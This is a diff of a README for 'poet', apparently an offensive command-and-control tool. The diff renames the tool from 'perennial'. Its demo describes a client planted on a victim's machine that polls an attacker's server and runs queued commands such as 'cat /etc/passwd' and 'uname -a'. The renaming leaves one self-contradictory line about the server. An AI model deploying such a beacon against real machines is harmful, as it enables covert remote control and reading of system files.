offlinemark/poet/README.md

 ## demo

-The attacker has gotten access to the victim's machine and downloaded and executed perennial.
-He/she does not have the server running at this point, but it's ok, perennial waits patiently.
-Eventually the attacker is ready and starts the server, telling perennial to execute the commands, "cat /etc/passwd" and "uname -a".
-The next time perennial pings the server it sees the commands queued to be executed and does so, one at a time.
-When all the commands have been executed, the server stops, but perennial keeps listening.
+The attacker has gotten access to the victim's machine and downloaded and executed the client.
+He/she does not have the server running at this point, but it's ok, the server waits patiently.
+Eventually the attacker is ready and starts the server, telling the client to execute the commands, "cat /etc/passwd" and "uname -a".
+The next time the client pings the server it sees the commands queued to be executed and does so, one at a time.
+When all the commands have been executed, the server stops, but the server keeps listening.

 Victim's Machine (5.4.3.2):

 ```
 $ ./client.py 1.2.3.4 5
-[+] Perennial started with delay of 5 seconds to port 80.
+[+] Poet started with delay of 5 seconds to port 80.
 Ctrl-c to exit.
 [!]
 (2014-05-07 21:52:29.475144) Could not connect to server.
 Waiting...
 [!]
 (2014-05-07 21:52:34.475740) Could not connect to server.
 Waiting...
 [!]
 (2014-05-07 21:52:39.475874) Could not connect to server.
 Waiting...